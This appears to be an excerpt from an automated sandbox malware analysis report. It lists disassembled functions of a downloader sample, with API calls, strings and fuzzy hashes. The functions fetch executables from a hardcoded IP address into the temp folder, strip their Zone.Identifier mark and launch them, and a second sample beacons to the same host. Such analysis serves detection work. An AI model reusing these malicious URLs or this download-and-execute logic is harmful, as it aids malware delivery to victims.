                                              • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 006E12B1
                                              • RegCloseKey.KERNELBASE(?), ref: 006E12CE
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 006E1277
                                              • NoDrives, xrefs: 006E12A8
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: cb3eb19471340dbb0cc85263514b2d42b9a0b62ecb1b2306af018bbd07bb36d5
                                              • Instruction ID: 6affc4b36772b3618830666eda28d376fc8f7c8f083f605eed730282bcc53c10
                                              • Opcode Fuzzy Hash: cb3eb19471340dbb0cc85263514b2d42b9a0b62ecb1b2306af018bbd07bb36d5
                                              • Instruction Fuzzy Hash: C011D870E0135A9FDB10CFD1C989BEEBBB5BB09704F104548E611AB280D7786A45DF91
                                              Function 006E16A0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 66sleepstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 006E16AE
                                                • Part of subcall function 006E10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006E10CA
                                                • Part of subcall function 006E10B0: wsprintfW.USER32 ref: 006E10E3
                                                • Part of subcall function 006E10B0: PathFileExistsW.KERNELBASE(?), ref: 006E10F3
                                                • Part of subcall function 006E1230: GetLogicalDrives.KERNELBASE ref: 006E1236
                                                • Part of subcall function 006E1230: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 006E1284
                                                • Part of subcall function 006E1230: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 006E12B1
                                                • Part of subcall function 006E1230: RegCloseKey.KERNELBASE(?), ref: 006E12CE
                                              • wsprintfA.USER32 ref: 006E1755
                                              • strcmp.MSVCR90 ref: 006E176A
                                                • Part of subcall function 006E1150: lstrcpyW.KERNEL32(?,?), ref: 006E11A3
                                              Strings
                                              • http://91.202.233.141/lksrv.exe, xrefs: 006E178F
                                              • http://91.202.233.141/lkdrv.exe, xrefs: 006E1776
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: wsprintf$CloseDrivesEnvironmentExistsExpandFileLogicalOpenPathQuerySleepStringsValuelstrcpystrcmp
                                              • String ID: http://91.202.233.141/lkdrv.exe$http://91.202.233.141/lksrv.exe
                                              • API String ID: 357889991-2508253401
                                              • Opcode ID: 580ee8f97e162e35365d21644bd13a2eed5206328c312eead0efbe7ae600a1ae
                                              • Instruction ID: 83ea9edf5a6304047fa163fad7825a8f12fabe5e2a76b3e27780a6f4ebfb00eb
                                              • Opcode Fuzzy Hash: 580ee8f97e162e35365d21644bd13a2eed5206328c312eead0efbe7ae600a1ae
                                              • Instruction Fuzzy Hash: 5821B6B4D023A89BCB60EB669C4D7AE7376AB05700F1441DCE5199F342DA309B84AF51
                                              Function 006E11B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 43 6e11b0-6e11d6 GetDriveTypeW 44 6e11d8-6e11df 43->44 45 6e1225-6e122b 43->45 46 6e11ec-6e1204 QueryDosDeviceW 44->46 47 6e11e1-6e11e8 44->47 46->45 49 6e1206-6e121c StrCmpNW 46->49 47->46 48 6e11ea 47->48 48->45 49->45 50 6e121e 49->50 50->45
                                              APIs
                                              • GetDriveTypeW.KERNELBASE(006E118F), ref: 006E11BD
                                              • QueryDosDeviceW.KERNELBASE(006E118F,?,00000208), ref: 006E11FC
                                              • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 006E1214
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 8bd7c183f5dc8e23e07147046c3dcd5cb35c891fe78833b27ee12e71d942ab9e
                                              • Instruction ID: cb44a08c43304d4ce2a2b41a30cd1ac30bb337774ecd58af9c3ef7f30890bab9
                                              • Opcode Fuzzy Hash: 8bd7c183f5dc8e23e07147046c3dcd5cb35c891fe78833b27ee12e71d942ab9e
                                              • Instruction Fuzzy Hash: D301E1B49513589BCB20CFA6DC497DDB7B6AB05705F0080A9A6049B340E6309BC5DF54
                                              Function 006E1150 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 63 6e1150-6e116a 64 6e116c-6e118a call 6e11b0 63->64 65 6e11a9-6e11af 63->65 67 6e118f-6e1199 64->67 67->65 68 6e119b-6e11a3 lstrcpyW 67->68 68->65
                                              APIs
                                                • Part of subcall function 006E11B0: GetDriveTypeW.KERNELBASE(006E118F), ref: 006E11BD
                                              • lstrcpyW.KERNEL32(?,?), ref: 006E11A3
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: DriveTypelstrcpy
                                              • String ID:
                                              • API String ID: 3664088370-0
                                              • Opcode ID: 295f8a4f5cd99dfe782f6b7f360bb7e8525e8e69804bd909cc57b1364c6a883f
                                              • Instruction ID: a7a8a2d229a4f12f8fe3295ece0abf2ce4776a0d795791e1940fe1691ae0021c
                                              • Opcode Fuzzy Hash: 295f8a4f5cd99dfe782f6b7f360bb7e8525e8e69804bd909cc57b1364c6a883f
                                              • Instruction Fuzzy Hash: 53F04471D00248FBDB00DFA8D845BEDB7B9EF44300F0085A8E8199B340E235AB49DB45

                                              Non-executed Functions

                                              Function 006E14E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 129 6e14e0-6e152b memset GetModuleHandleW 130 6e1634 129->130 131 6e1531-6e1550 GetProcAddress 129->131 132 6e1636-6e1639 130->132 131->130 133 6e1556-6e1565 131->133 133->130 135 6e156b-6e1572 133->135 136 6e15d4-6e15db 135->136 137 6e1574-6e157b 135->137 136->130 139 6e15dd-6e1616 memset GetVersionExA 136->139 137->136 138 6e157d-6e15b6 memset GetVersionExA 137->138 138->136 140 6e15b8-6e15c2 138->140 139->130 141 6e1618-6e1622 139->141 144 6e15c4-6e15ce 140->144 145 6e15d0-6e15d2 140->145 142 6e1624-6e162e 141->142 143 6e1630-6e1632 141->143 142->130 142->143 143->132 144->136 144->145 145->132
                                              APIs
                                              • memset.MSVCR90 ref: 006E1501
                                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 006E1518
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 006E153D
                                              • memset.MSVCR90 ref: 006E1595
                                              • GetVersionExA.KERNEL32(0000009C), ref: 006E15AE
                                              • memset.MSVCR90 ref: 006E15F5
                                              • GetVersionExA.KERNEL32(0000009C), ref: 006E160E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: memset$Version$AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 3060919973-1489217083
                                              • Opcode ID: 6ec84185e4a1082cd9168ba93cb2ec2d45d3767970ee28b7ed91b6b949b09546
                                              • Instruction ID: 26fd4156811e5941bfb6b99edd3a5b9cc89748c01effb5410022a9910abf3a0c
                                              • Opcode Fuzzy Hash: 6ec84185e4a1082cd9168ba93cb2ec2d45d3767970ee28b7ed91b6b949b09546
                                              • Instruction Fuzzy Hash: C931CC70C063AC9ADF34CB228C4EBEAB776AB56700F0401D8E1495A2C1D7758F85EF91
                                              Function 006E1B24 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 164 6e1b24-6e1b31 SetUnhandledExceptionFilter
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00001AE2), ref: 006E1B29
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 6cca905fb2452a0d6afedccdf30d06e3a9a9cfdd831748dafe2320687f0cd58c
                                              • Instruction ID: 29ebfe759e107ea68b7a33c68bb276a812d52ac9ef185c5810c20cd728a3f930
                                              • Opcode Fuzzy Hash: 6cca905fb2452a0d6afedccdf30d06e3a9a9cfdd831748dafe2320687f0cd58c
                                              • Instruction Fuzzy Hash: 3690027029339046971017B65D4D61676A75A597167521465A101CD164EA6042447522
                                              Function 006E12F0 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 129networkfilestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 006E12F9
                                              • srand.MSVCR90 ref: 006E1300
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006E1320
                                              • strlen.MSVCR90 ref: 006E132A
                                              • mbstowcs.MSVCR90 ref: 006E1341
                                              • rand.MSVCR90 ref: 006E1349
                                              • rand.MSVCR90 ref: 006E135D
                                              • wsprintfW.USER32 ref: 006E1384
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 006E139A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 006E13C9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 006E13F8
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 006E142B
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 006E145C
                                              • CloseHandle.KERNEL32(000000FF), ref: 006E146B
                                              • wsprintfW.USER32 ref: 006E1484
                                              • DeleteFileW.KERNEL32(?), ref: 006E1494
                                              • CloseHandle.KERNEL32(000000FF), ref: 006E14B0
                                              • InternetCloseHandle.WININET(00000000), ref: 006E14BD
                                              • InternetCloseHandle.WININET(00000000), ref: 006E14CA
                                              Strings
                                              • %s:Zone.Identifier, xrefs: 006E1478
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 006E1395
                                              • %s\%d%d.exe, xrefs: 006E1378
                                              • %temp%, xrefs: 006E131B
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                              • API String ID: 770025858-111153409
                                              • Opcode ID: 90566ec5a0f69fe08c753128ef857c07176d0b81b01034685179efa87e9098da
                                              • Instruction ID: 3401b3e948bf641a66436dfdeb0bdbf53309647aca7989df88634913ce4096a5
                                              • Opcode Fuzzy Hash: 90566ec5a0f69fe08c753128ef857c07176d0b81b01034685179efa87e9098da
                                              • Instruction Fuzzy Hash: 284169B1942368ABEB20DB50DC4DFE9737BAB88701F0445D8F609AB2D1DA749B84CF54
                                              Function 006E1000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 146 6e1000-6e1060 memset * 2 CreateProcessW 147 6e1062-6e106f Sleep 146->147 148 6e1071-6e1095 ShellExecuteW 146->148 149 6e10a8-6e10ab 147->149 150 6e10a6 148->150 151 6e1097-6e10a4 Sleep 148->151 150->149 151->149
                                              APIs
                                              • memset.MSVCR90 ref: 006E100E
                                              • memset.MSVCR90 ref: 006E101E
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 006E1057
                                              • Sleep.KERNEL32(000003E8), ref: 006E1067
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 006E1082
                                              • Sleep.KERNEL32(000003E8), ref: 006E109C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: 94f5cb1230f3e11a3b904c24e694fa3e1844234ed86705170fb9b77ad2ca80c0
                                              • Instruction ID: 91f5b0c389d8ebd8a154c4962698c8bf7883dc4ba5e1405c7cd79fa2de7338f4
                                              • Opcode Fuzzy Hash: 94f5cb1230f3e11a3b904c24e694fa3e1844234ed86705170fb9b77ad2ca80c0
                                              • Instruction Fuzzy Hash: 70117771E41358BBEB20DF90CC4AFDD7776AB15B01F100119F6086F2C0DAB19A44D755

                                              Callgraph

                                              Executed Functions

                                              Function 00221000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 40networksleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • wsprintfW.USER32 ref: 00221015
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0022102B
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00221056
                                              • Sleep.KERNELBASE(000003E8), ref: 00221064
                                              • InternetCloseHandle.WININET(?), ref: 0022106E
                                              • Sleep.KERNELBASE(000003E8), ref: 00221079
                                              • InternetCloseHandle.WININET(00000000), ref: 00221086
                                              Strings
                                              • http://91.202.233.141/PLTRESA, xrefs: 00221009
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00221026
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2489279018.0000000000221000.00000020.00000001.01000000.00000008.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2489256104.0000000000220000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000007.00000002.2489656463.0000000000224000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_220000_524024912.jbxd
                                              Similarity
                                              • API ID: Internet$CloseHandleOpenSleep$wsprintf
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/PLTRESA
                                              • API String ID: 2685051180-2880211933
                                              • Opcode ID: 10e36c117bb3bafa3abfd4a6561f9af5948bc07e8f2b53d5ad8100f541034b35
                                              • Instruction ID: 14d05ec07919e58795e20e1f7234347409afc645aadfc35923e1d8d14815436c
                                              • Opcode Fuzzy Hash: 10e36c117bb3bafa3abfd4a6561f9af5948bc07e8f2b53d5ad8100f541034b35
                                              • Instruction Fuzzy Hash: E8017C74E80316FBD7359FE4ED0EF697678EB18701F101198BA09A61C0CAB12B59CA69
                                              Function 00221090 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 002210AA
                                              • wsprintfW.USER32 ref: 002210C3
                                              • PathFileExistsW.KERNELBASE(?), ref: 002210D3
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 002210F9
                                              • CloseHandle.KERNELBASE(000000FF), ref: 00221115
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2489279018.0000000000221000.00000020.00000001.01000000.00000008.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2489256104.0000000000220000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000007.00000002.2489656463.0000000000224000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_220000_524024912.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\85858737373d.txt$%temp%
                                              • API String ID: 750032643-1651764242
                                              • Opcode ID: 815fd53a2c43b742d056211bc09f2f053e9189d539b851d971aaf4bdc812b720
                                              • Instruction ID: 52208627266347b7cbcffdc1fcc6c056c3d7ed11bbd8dd79ddf145fd318bda08
                                              • Opcode Fuzzy Hash: 815fd53a2c43b742d056211bc09f2f053e9189d539b851d971aaf4bdc812b720
                                              • Instruction Fuzzy Hash: A10184B055032CFBDB309BA0AC4EFE57378AB54700F404694A719960D1E6B25BAACFA5
                                              Function 00221130 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 9 221130-221148 Sleep call 221090 12 22114a call 221000 9->12 13 22114f-221152 9->13 12->13
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00221138
                                                • Part of subcall function 00221090: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 002210AA
                                                • Part of subcall function 00221090: wsprintfW.USER32 ref: 002210C3
                                                • Part of subcall function 00221090: PathFileExistsW.KERNELBASE(?), ref: 002210D3
                                                • Part of subcall function 00221000: wsprintfW.USER32 ref: 00221015
                                                • Part of subcall function 00221000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0022102B
                                                • Part of subcall function 00221000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00221056
                                                • Part of subcall function 00221000: Sleep.KERNELBASE(000003E8), ref: 00221064
                                                • Part of subcall function 00221000: InternetCloseHandle.WININET(?), ref: 0022106E
                                                • Part of subcall function 00221000: Sleep.KERNELBASE(000003E8), ref: 00221079
                                                • Part of subcall function 00221000: InternetCloseHandle.WININET(00000000), ref: 00221086
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2489279018.0000000000221000.00000020.00000001.01000000.00000008.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2489256104.0000000000220000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000007.00000002.2489656463.0000000000224000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_220000_524024912.jbxd
                                              Similarity
                                              • API ID: Internet$Sleep$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathStrings
                                              • String ID:
                                              • API String ID: 344363592-0
                                              • Opcode ID: 6be1613f5ca6b5ab8af86f57000dd05c1324b0b8b70ce32bfc0ed13ad1745640
                                              • Instruction ID: c88b8584859c40f1c219df0f8b633cb81fd250036788b614f705b71aed381ba1
                                              • Opcode Fuzzy Hash: 6be1613f5ca6b5ab8af86f57000dd05c1324b0b8b70ce32bfc0ed13ad1745640
                                              • Instruction Fuzzy Hash: 0DC08C3112426A32911032F27C0BF36329C4B30BA2F401423B908C4086DD82D57598B1

                                              Callgraph

                                              Executed Functions

                                              Function 00A310B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00A310CA
                                              • wsprintfW.USER32 ref: 00A310E3
                                              • PathFileExistsW.KERNELBASE(?), ref: 00A310F3
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00A31119
                                              • CloseHandle.KERNEL32(000000FF), ref: 00A31135
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\afaefefaeff.txt$%temp%
                                              • API String ID: 750032643-3182922545
                                              • Opcode ID: 2bb45e398fe450a1a09e43dcc26897d8d81f46c516796b04917ff134c79b2073
                                              • Instruction ID: 5c37779793f12fda13433c8b08791bf5752a99d566e8ad1295e555dc83bd8fe1
                                              • Opcode Fuzzy Hash: 2bb45e398fe450a1a09e43dcc26897d8d81f46c516796b04917ff134c79b2073
                                              • Instruction Fuzzy Hash: EE01A2B1944318BBDF20DBA09C4EFE67338AB44701F408798B715A20D1DBB49BC68FA4
                                              Function 00A316A0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 66sleepstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A316AE
                                                • Part of subcall function 00A310B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00A310CA
                                                • Part of subcall function 00A310B0: wsprintfW.USER32 ref: 00A310E3
                                                • Part of subcall function 00A310B0: PathFileExistsW.KERNELBASE(?), ref: 00A310F3
                                                • Part of subcall function 00A31230: GetLogicalDrives.KERNEL32 ref: 00A31236
                                                • Part of subcall function 00A31230: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00A31284
                                                • Part of subcall function 00A31230: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00A312B1
                                                • Part of subcall function 00A31230: RegCloseKey.ADVAPI32(?), ref: 00A312CE
                                              • wsprintfA.USER32 ref: 00A31755
                                              • strcmp.MSVCR90 ref: 00A3176A
                                                • Part of subcall function 00A31150: lstrcpyW.KERNEL32(?,?), ref: 00A311A3
                                              Strings
                                              • http://91.202.233.141/lksrv.exe, xrefs: 00A3178F
                                              • http://91.202.233.141/lkdrv.exe, xrefs: 00A31776
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: wsprintf$CloseDrivesEnvironmentExistsExpandFileLogicalOpenPathQuerySleepStringsValuelstrcpystrcmp
                                              • String ID: http://91.202.233.141/lkdrv.exe$http://91.202.233.141/lksrv.exe
                                              • API String ID: 357889991-2508253401
                                              • Opcode ID: 0d273ac004c00914fe05ed54678a8cdb4758d1a0ff2002c2ae55c4392dc1fe6e
